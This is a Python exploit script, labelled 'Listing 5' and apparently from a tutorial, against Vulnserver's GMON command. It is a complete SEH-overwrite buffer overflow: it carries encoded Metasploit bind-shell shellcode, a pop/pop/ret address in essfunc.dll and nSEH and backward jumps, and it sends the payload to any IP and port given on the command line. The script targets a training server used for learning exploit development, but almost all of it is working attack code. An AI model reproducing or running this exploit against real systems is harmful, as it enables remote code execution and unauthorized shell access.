#Listing 5: Vulnserver-Exploit

import socket
import sys


ip 	= str(sys.argv[1])
port 	= int(sys.argv[2])

offset_to_nseh = 3498
jmp_back = 800

# msfpayload windows/shell_bind_tcp R | ./msfencode -b '\x00\x0a\x0d' -t c 
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = (
"\xd9\xcb\xd9\x74\x24\xf4\xbf\x79\xe7\xa5\x96\x5d\x31\xc9\xb1"
"\x56\x83\xc5\x04\x31\x7d\x14\x03\x7d\x6d\x05\x50\x6a\x65\x40"
"\x9b\x93\x75\x33\x15\x76\x44\x61\x41\xf2\xf4\xb5\x01\x56\xf4"
"\x3e\x47\x43\x8f\x33\x40\x64\x38\xf9\xb6\x4b\xb9\xcf\x76\x07"
"\x79\x51\x0b\x5a\xad\xb1\x32\x95\xa0\xb0\x73\xc8\x4a\xe0\x2c"
"\x86\xf8\x15\x58\xda\xc0\x14\x8e\x50\x78\x6f\xab\xa7\x0c\xc5"
"\xb2\xf7\xbc\x52\xfc\xef\xb7\x3d\xdd\x0e\x14\x5e\x21\x58\x11"
"\x95\xd1\x5b\xf3\xe7\x1a\x6a\x3b\xab\x24\x42\xb6\xb5\x61\x65"
"\x28\xc0\x99\x95\xd5\xd3\x59\xe7\x01\x51\x7c\x4f\xc2\xc1\xa4"
"\x71\x07\x97\x2f\x7d\xec\xd3\x68\x62\xf3\x30\x03\x9e\x78\xb7"
"\xc4\x16\x3a\x9c\xc0\x73\x99\xbd\x51\xde\x4c\xc1\x82\x86\x31"
"\x67\xc8\x25\x26\x11\x93\x21\x8b\x2c\x2c\xb2\x83\x27\x5f\x80"
"\x0c\x9c\xf7\xa8\xc5\x3a\x0f\xce\xfc\xfb\x9f\x31\xfe\xfb\xb6"
"\xf5\xaa\xab\xa0\xdc\xd2\x27\x31\xe0\x07\xe7\x61\x4e\xf7\x48"
"\xd2\x2e\xa7\x20\x38\xa1\x98\x51\x43\x6b\xaf\x55\x8d\x4f\xfc"
"\x31\xec\x6f\x13\x9e\x79\x89\x79\x0e\x2c\x01\x15\xec\x0b\x9a"
"\x82\x0f\x7e\xb6\x1b\x98\x36\xd0\x9b\xa7\xc6\xf6\x88\x04\x6e"
"\x91\x5a\x47\xab\x80\x5d\x42\x9b\xcb\x66\x05\x51\xa2\x25\xb7"
"\x66\xef\xdd\x54\xf4\x74\x1d\x12\xe5\x22\x4a\x73\xdb\x3a\x1e"
"\x69\x42\x95\x3c\x70\x12\xde\x84\xaf\xe7\xe1\x05\x3d\x53\xc6"
"\x15\xfb\x5c\x42\x41\x53\x0b\x1c\x3f\x15\xe5\xee\xe9\xcf\x5a"
"\xb9\x7d\x89\x90\x7a\xfb\x96\xfc\x0c\xe3\x27\xa9\x48\x1c\x87"
"\x3d\x5d\x65\xf5\xdd\xa2\xbc\xbd\xee\xe8\x9c\x94\x66\xb5\x75"
"\xa5\xea\x46\xa0\xea\x12\xc5\x40\x93\xe0\xd5\x21\x96\xad\x51"
"\xda\xea\xbe\x37\xdc\x59\xbe\x1d")


# NOTE: This misterious 12 is the length of pointer to nSEH, SEH and junk2
# 	The jump back must take into account this :)
pattern = "A" * (offset_to_nseh - jmp_back + 12)  # junk 1
pattern += shellcode
pattern += "X" * (jmp_back - 12 -len(shellcode))
pattern += "\xeb\x0a\x90\x90"		# pointer to nSEH: jmp $+0x0a
pattern += "\xb4\x10\x50\x62"		# pointer to SEH: 0x625010b4 (pop/pop/ret @ essfunc.dll)
pattern += "\xCC" * 4			# junk 2
pattern += "\xe9\xdb\xfc\xff\xff"	# jmp $-800 (backwards)
pattern += "C" * (5000 - offset_to_nseh - 17)


try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print "\nConnecting to %s:%d" % (ip, port)
	connect = s.connect((ip, port))
	data = s.recv(1024)
	print "[x]", data
	print "[x] Sending packet?"
	buffer = 'GMON /' + pattern
	s.send(buffer + '\r\n')
	data = s.recv(1024)
	print "Is it dead?"
except:
	print "[!] Unable to connect... :("


